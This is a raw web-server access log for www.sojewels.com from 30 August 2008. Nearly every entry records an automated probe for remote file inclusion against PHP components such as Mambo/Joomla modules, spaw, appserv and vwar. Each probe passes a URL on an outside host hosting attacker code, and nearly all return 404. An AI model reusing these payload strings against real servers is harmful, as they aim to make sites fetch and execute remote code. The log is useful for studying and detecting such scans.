89.208.43.121 - - [30/Aug/2008:17:01:26 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:01:27 -0700] "GET //tools/send_reminders.php?includedir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:01:31 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:01:32 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:01:36 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:01:39 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
64.246.42.3 - - [30/Aug/2008:17:01:51 -0700] "GET //args.php?arg=http://h1.ripway.com/loser1337/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
64.246.42.3 - - [30/Aug/2008:17:01:52 -0700] "GET /logs//args.php?arg=http://h1.ripway.com/loser1337/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:02:19 -0700] "GET /logs/scripts.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:02:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:02:21 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.25.180.198 - - [30/Aug/2008:17:03:01 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.25.180.198 - - [30/Aug/2008:17:03:05 -0700] "GET /logs/access.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:17:05:04 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.25.180.198 - - [30/Aug/2008:17:05:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.25.180.198 - - [30/Aug/2008:17:05:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.25.180.198 - - [30/Aug/2008:17:05:32 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:06:11 -0700] "GET //zipndownload.php?PP_PATH=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:06:20 -0700] "GET //zipndownload.php?PP_PATH=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:06:24 -0700] "GET /logs//zipndownload.php?PP_PATH=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:06:28 -0700] "GET /logs/scripts.log/errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:06:33 -0700] "GET /errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
83.240.164.232 - - [30/Aug/2008:17:06:37 -0700] "GET /logs/errors.php?error=http://www.sfj.pt/mambo/id22.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
74.55.109.34 - - [30/Aug/2008:17:08:55 -0700] "GET /logs/access_080701.log/index2.php?content=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
212.92.23.89 - - [30/Aug/2008:17:09:09 -0700] "GET /logs///multithumb.php?mosConfig_absolute_path=http://www.skilful.nu/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:09:50 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:09:54 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:09:57 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
89.208.43.121 - - [30/Aug/2008:17:09:57 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
89.108.67.220 - - [30/Aug/2008:17:12:35 -0700] "GET /logs/access_080301.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
212.9.74.203 - - [30/Aug/2008:17:13:42 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.159.202.119 - - [30/Aug/2008:17:13:58 -0700] "GET /logs/access.log HTTP/1.0" 200 7440 "-" "Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e" "www.sojewels.com"
81.52.143.16 - - [30/Aug/2008:17:14:10 -0700] "GET http://www.sojewels.com:80/robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.sojewels.com"
81.52.143.16 - - [30/Aug/2008:17:14:16 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:17:18:08 -0700] "GET /logs/access.log/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:17:18:08 -0700] "GET /errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
217.96.120.45 - - [30/Aug/2008:17:18:09 -0700] "GET /logs/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:19:06 -0700] "GET /logs/access_080501.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:19:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:19:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
207.249.0.39 - - [30/Aug/2008:17:19:19 -0700] "GET /logs/access_080301.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.6.22.171 - - [30/Aug/2008:17:20:10 -0700] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
59.125.5.1 - - [30/Aug/2008:17:20:26 -0700] "GET /logs/access_080331.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
59.125.5.1 - - [30/Aug/2008:17:20:32 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
59.125.5.1 - - [30/Aug/2008:17:20:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
210.1.31.67 - - [30/Aug/2008:17:22:34 -0700] "GET /logs/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.1.31.67 - - [30/Aug/2008:17:22:34 -0700] "GET /logs/access.log/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.1.31.67 - - [30/Aug/2008:17:22:34 -0700] "GET /errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.214.120.47 - - [30/Aug/2008:17:22:36 -0700] "GET /logs/access_080331.log/errors.php?error=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.214.120.47 - - [30/Aug/2008:17:22:36 -0700] "GET /errors.php?error=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
85.214.120.47 - - [30/Aug/2008:17:22:36 -0700] "GET /logs/errors.php?error=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.140.19.17 - - [30/Aug/2008:17:24:31 -0700] "GET /errors.php?_REQUEST%5B%22error%22%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.sojewels.com"
62.140.19.17 - - [30/Aug/2008:17:24:31 -0700] "GET /logs/errors.php?_REQUEST%5B%22error%22%5D=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:17:25:23 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:17:25:24 -0700] "GET //appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:17:25:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:27:02 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:27:48 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:27:48 -0700] "GET //appserv/main.php?appserv_root=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:27:48 -0700] "GET /logs//appserv/main.php?appserv_root=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:17:29:35 -0700] "GET /logs//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:17:29:35 -0700] "GET //appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:17:29:36 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
216.55.159.47 - - [30/Aug/2008:17:30:00 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:17:30:24 -0700] "GET //appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:17:30:25 -0700] "GET /logs//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:17:30:26 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:33:08 -0700] "GET /logs/access_080501.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:33:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:33:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:34:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:34:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:34:13 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:26 -0700] "GET //include/write.php?dir=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:26 -0700] "GET /logs/access_080501.log//include/write.php?dir=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:26 -0700] "GET /logs//include/write.php?dir=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:50 -0700] "GET //errors.php?error=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:51 -0700] "GET /logs/access.log//errors.php?error=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:34:51 -0700] "GET /logs//errors.php?error=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
66.221.68.20 - - [30/Aug/2008:17:35:22 -0700] "GET /logs/access.log/errors.php?_REQUEST%5B%22error%22%5D=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.sojewels.com"
66.221.68.20 - - [30/Aug/2008:17:35:23 -0700] "GET /errors.php?_REQUEST%5B%22error%22%5D=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.sojewels.com"
66.221.68.20 - - [30/Aug/2008:17:35:23 -0700] "GET /logs/errors.php?_REQUEST%5B%22error%22%5D=http://www.worldbeatgolf.com/cache/bo.do??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:35:58 -0700] "GET /logs/access_080501.log/modules/My_eGallery/index.php?basepath=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
72.233.63.178 - - [30/Aug/2008:17:38:07 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.193.130 - - [30/Aug/2008:17:38:54 -0700] "GET /logs/access_080501.log%20//include/write.php?dir=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
98.129.92.58 - - [30/Aug/2008:17:39:30 -0700] "GET /logs/access_080501.log%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
217.147.236.10 - - [30/Aug/2008:17:40:12 -0700] "GET /logs/access_080331.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
217.147.236.10 - - [30/Aug/2008:17:40:13 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
217.147.236.10 - - [30/Aug/2008:17:40:15 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:44:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:44:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:44:02 -0700] "GET /logs/access_080501.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:44:22 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
213.149.238.6 - - [30/Aug/2008:17:49:44 -0700] "GET /logs/access.log/errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
213.149.238.6 - - [30/Aug/2008:17:49:44 -0700] "GET /logs/errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
213.149.238.6 - - [30/Aug/2008:17:49:46 -0700] "GET /errors.php?error=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.127 - - [30/Aug/2008:17:49:54 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.clanramsey.net/genealogy/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.127 - - [30/Aug/2008:17:49:54 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.clanramsey.net/genealogy/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
89.255.60.127 - - [30/Aug/2008:17:49:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.clanramsey.net/genealogy/css/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:52:17 -0700] "GET /logs/access.log/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:52:18 -0700] "GET /errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.130.79.38 - - [30/Aug/2008:17:52:18 -0700] "GET /logs/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
59.125.5.1 - - [30/Aug/2008:17:53:10 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
89.108.66.140 - - [30/Aug/2008:17:53:27 -0700] "GET //amember/common.inc.php?config[check_email]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
194.79.75.195 - - [30/Aug/2008:17:54:01 -0700] "GET //amember/common.inc.php?config[check_email]=http://verkoophulp.com/myid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
84.21.71.133 - - [30/Aug/2008:17:54:52 -0700] "GET /logs/access.log/errors.php?error=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
84.21.71.133 - - [30/Aug/2008:17:54:52 -0700] "GET /errors.php?error=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
84.21.71.133 - - [30/Aug/2008:17:54:52 -0700] "GET /logs/errors.php?error=http://www.asrintl1.com/usps/claroline/manual/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:56:49 -0700] "GET /logs/access.log/errors.php?error=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:56:49 -0700] "GET /logs/errors.php?error=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
66.103.152.151 - - [30/Aug/2008:17:56:49 -0700] "GET /errors.php?error=http://lawoder.t35.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
202.142.223.177 - - [30/Aug/2008:18:00:48 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:02:11 -0700] "GET /logs/access_080331.log/?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:02:11 -0700] "GET /?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:03:11 -0700] "GET /logs/access_080331.log/?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:03:11 -0700] "GET /?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:03:11 -0700] "GET /logs/?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:04:20 -0700] "GET /logs/access.log/?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
200.11.67.242 - - [30/Aug/2008:18:05:07 -0700] "GET /logs/access.log/?sourcedir=http://www.herrderringe-net.de/terranova/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
212.97.132.101 - - [30/Aug/2008:18:13:31 -0700] "GET /logs/access_080501.log//?path%5Bdocroot%5D=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.sojewels.com"
